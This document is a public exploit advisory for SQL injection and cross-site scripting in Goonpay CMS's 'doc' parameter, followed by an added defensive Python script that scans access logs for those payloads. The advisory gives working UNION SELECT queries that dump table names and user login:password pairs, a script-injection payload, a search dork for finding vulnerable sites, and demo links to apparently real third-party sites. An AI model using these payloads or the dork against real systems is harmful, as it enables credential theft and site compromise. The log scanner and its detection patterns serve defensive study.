Goonpay CMS Multiple Vulnerability

2013.10.13
Credit: Arsan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: Goonpay CMS Multiple Vulnerability
# Date: 2013 12 October
# Author: Arsan
# Vendor Homepage: http://www.goonpay.com
# Version : All Version
# Security Risk: High
# Tested on: Backtrack
# Category: webapps
# Google Dork: inurl:"/?doc=" , intext:"Conception graphique : goonpay.com"
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# [-] Description :
# SQL Injection And XSS In (index.php) Parameter "doc" :
# http://<server>/?doc=[SQL-Injection][XSS]
# [-] Description Exploit :
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[SQL Injection]
# (+) Tables Name:
# (+) Query :
# +union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()--
# _recettes
# departements
# doctypes
# documents
# galeries
# notesRecettes
# sharedRecettes
# timesConvertor
# users
# usersaccreditations
# userslvl
# ----------
# (+) User Table (users) Columns :
# (+) Query :
# +union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x7573657273
# id
# login
# pass
# nom
# mail
# dept
# userlvl
# adresse
# tel
# prenom
# date_naissance
# lieu_naissance
# cp
# ville
# nom_entreprise
# lieu_entreprise
# domaine_competence_entreprise
# fonction_entreprise
# tel_pro
# hobbies
# photo
# ----------
# (+) User And Password In : login,0x3a,pass
# (+) Query :
# +union+select+1,2,group_concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[XSS]
# Just Insert This Code After Url :
# "><script>alert(/Arsan/)</script>
# Example :
# http://dietiXoandco.fr/?doc="><script>alert(/Arsan/)</script>
# http://redXden.com/?doc="><script>alert(/Arsan/)</script>
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Demo :
#
# http://dietisXoandco.fr/?doc=[SQL-Injection][XSS]
# http://redraXen.com/?doc=[SQL-Injection][XSS]
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
# Arsan.Blackhat@gmail.com
# Twitter.com/ArsanBlackhat
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
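
Added example (not part of the original advisory, and not Goonpay or vendor code): a log-review script for site operators that flags requests whose "doc" parameter carries the UNION/information_schema or script-tag patterns described above. The log lines, client addresses and rule names are constructed for illustration, and the access-log layout is assumed to be the common/combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Oct/2013:10:01:02 +0200] "GET /?doc=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [13/Oct/2013:10:02:11 +0200] "GET /?doc=-1+union+select+1,2,'
    'group_concat(table_name),4+from+information_schema.tables-- HTTP/1.1" 200 7300',
    '198.51.100.9 - - [13/Oct/2013:10:03:40 +0200] "GET /?doc=%22%3E%3Cscript%3E'
    'alert(1)%3C/script%3E HTTP/1.1" 200 5200',
    '203.0.113.4 - - [13/Oct/2013:10:04:00 +0200] "GET /?page=union+station HTTP/1.1" 200 900',
]

# Rule names are hypothetical labels; patterns mirror the markers in the advisory.
RULES = {
    "sqli-union": re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
    "sqli-schema": re.compile(r"information_schema", re.I),
    "xss-markup": re.compile(r'''<\s*script\b|["']\s*>''', re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify_doc(value):
    """Return the sorted rule names matched by a URL-decoded `doc` value."""
    return sorted(name for name, rx in RULES.items() if rx.search(value))


def scan(lines):
    """Return (client_ip, decoded_doc, hits) for each suspicious `doc` request."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs decodes %XX and '+', so encoded payloads are matched too.
        for value in parse_qs(query, keep_blank_values=True).get("doc", []):
            hits = classify_doc(value)
            if hits:
                findings.append((line.split()[0], value, hits))
    return findings


if __name__ == "__main__":
    for ip, value, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits), repr(value))
```

Only the "doc" parameter is inspected, so the benign "page=union+station" request is not reported. Hits show that the parameter was probed, not that the query succeeded; the fix is still parameterized queries and output encoding in index.php.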



Copyright 2024, cxsecurity.com

 
